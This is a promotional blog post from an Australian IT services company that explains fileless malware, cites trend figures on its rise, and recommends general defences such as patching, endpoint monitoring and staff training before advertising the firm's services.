Malware, whether it be computer viruses, spyware, or ransomware, typically uses files to infiltrate a system and wreak havoc. It’s a threat many Australian businesses are aware of and go to great lengths to prevent, but cyberthreats are ever-evolving.
Today, hackers are finding massive success with a sophisticated class of threats called ‘fileless malware.’ What makes these attacks so terrifying is that they evade detection by traditional security systems to carry out a slew of malicious activities. To ensure your business’s safety, here’s everything you need to know.
What is fileless malware?
Fileless malware differs from traditional malware in that it doesn’t insert malicious files and programs in a computer. Instead, it injects itself into a computer’s temporary memory (or RAM) to execute malicious processes. Victims often contract fileless malware by clicking on spam emails or ads that contain links to an infected website. These sites will then load malicious Flash or Java processes that interact with a computer’s built-in applications.
Fileless attacks usually take advantage of legitimate applications like Windows PowerShell, a system administrator tool used for automating processes and other configurations. If hackers manage to compromise these apps, they can harm your computer in various ways. For example, they can:
- Elevate their access privileges to gain access to personal records and corporate information
- Plant bits of code that enable fileless malware to remain despite removal attempts
- Transfer data directly from your computer to a hacker’s remote server
- Launch ransomware and denial-of-service attacks
Given that traditional anti-malware solutions use file-based detection, it won’t be able to protect you against fileless malware. What’s worse, since the threat runs on a computer’s temporary memory, all traces of it disappear when either its mission has been carried out or a user reboots their machine. This makes fileless malware extremely difficult to detect, analyse, and remove.
Fileless malware trends
Although traditional malware attacks continue to plague Australian organisations, more hackers are relying on fileless attacks to breach corporate systems. A study from McAfee Labs reveals that fileless attacks surged by 432% between 2016 and 2017. This trend continued in 2018 as more than 4,000 new PowerShell fileless malware were discovered every quarter.
A Kaspersky report also found that banks, telecommunication companies, and government agencies were prime targets for fileless attacks. This is largely because such organizations have massive networks that span across the globe and store vast amounts of data that are extremely valuable to cybercriminals.
However, these threats will likely become more indiscriminate and potent in the coming months.
What will happen in 2019?
There’s no denying that fileless malware attacks on Australian businesses are on the rise. Since these attacks infiltrate a computer as soon as users visit an infected website, phishing emails will have even higher success rates. What’s more, ready-made fileless malware kits will likely become a staple on the black market. Combine these with the fact that many users run unpatched software, and fileless attacks will be commonplace in 2019.
Cybersecurity specialists also predict more fileless attacks will develop self-propagating or wormlike properties. These fileless worms, or ‘vaporworms,’ exploit software vulnerabilities to spread to other machines connected to the same network. Such attacks can be used for large-scale denial of service and ransomware attacks. In fact, WannaCry and Petya ransomware exhibited vaporworm elements when they managed to spread to hundreds of thousands of computers worldwide.
How to defend against fileless malware
Reducing your company’s exposure to fileless malware goes beyond anti-malware solutions. It requires a multilayered approach that begins with proactively updating your software. This especially includes Microsoft applications like PowerShell and Windows Defender that now have enhanced security measures against fileless attacks.
Advanced endpoint protection systems are another key element of your defense strategy. These tools monitor your systems for suspicious behaviour, such as high RAM usage, computers connecting to unusual servers, and data leaving the network. You should also set stringent access restrictions for company devices and disable system administrator tools if users don’t need them.
Finally, since fileless malware is often distributed via phishing emails and dangerous websites, comprehensive security training is a must. Employees who are aware of the latest threats and are suspicious of every email and link can dramatically reduce the chances of a fileless malware infection.
Empower IT protects Australian businesses from these threats. Our cybersecurity service comes with cutting-edge endpoint protection, access restrictions, patch management, network monitoring, security training, and more. Call us today to get a cybersecurity framework that prevents the most advanced attacks.